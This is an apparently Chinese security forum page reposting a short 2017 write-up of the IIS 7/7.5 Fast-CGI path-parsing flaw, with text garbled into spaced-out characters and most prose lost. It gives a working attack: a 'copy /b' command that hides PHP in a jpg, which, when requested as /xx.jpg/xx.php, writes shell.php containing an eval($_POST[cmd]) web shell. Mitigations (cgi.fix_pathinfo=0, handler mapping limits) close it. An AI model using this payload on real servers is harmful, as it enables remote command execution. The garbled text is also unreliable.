[20935] 2017-11-09_IIS7&7.5解析漏洞

文档创建者:s7ckTeam
浏览次数:14
最后更新:2025-01-18
2017-11-09_IIS7&7.5解析漏洞 I I S 7 & 7 . 5 L e m o n S e c   2 0 1 7 - 1 1 - 0 9 I I S 7 / 7 . 5 F a s t - C G I , ( / x x . j p g ) / x x . p h p / x x . j p g / x x . p h p     p h p  
  e . g .   c o p y   x x . j p g / b   +   y y . t x t / a   x y . j p g # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # / b   [ b i n a r y ] / a   a s c i i   x x . j p g   y y . t x t     < ? P H P f p u t s ( f o p e n ( ' s h e l l . p h p ' , ' w ' ) , ' < ? p h p   e v a l ( $ _ P O S T [ c m d ] ) ? > ' ) ; ? >   < ? p h p   e v a l ( $ _ P O S T [ c m d ] ) ? >   s h e l l . p h p   # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #   x y . j p g   ,   x y . j p g     / x x . p h p     s h e l l . p h p     c m d 1 .                 p h p . i n i c g i . f i x _ p a t h i n f o = 1 ( 1 )
2 .                 H a n d l e r   M a p p i n g 1 .             c g i . p a t h i n f o ( p h p . i n i ) 0 p h p - c g i 2 .             H a n d l e r   M a p p i n g p h p - c g i . e x e I n v o k e   h a n d l e r   o n l y   i f   r e q u e s t   i s   m a p p e d   t o
3 .             i i s 使 I S A P I ( P H P 5 . 3 . 1 I S A P I )
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则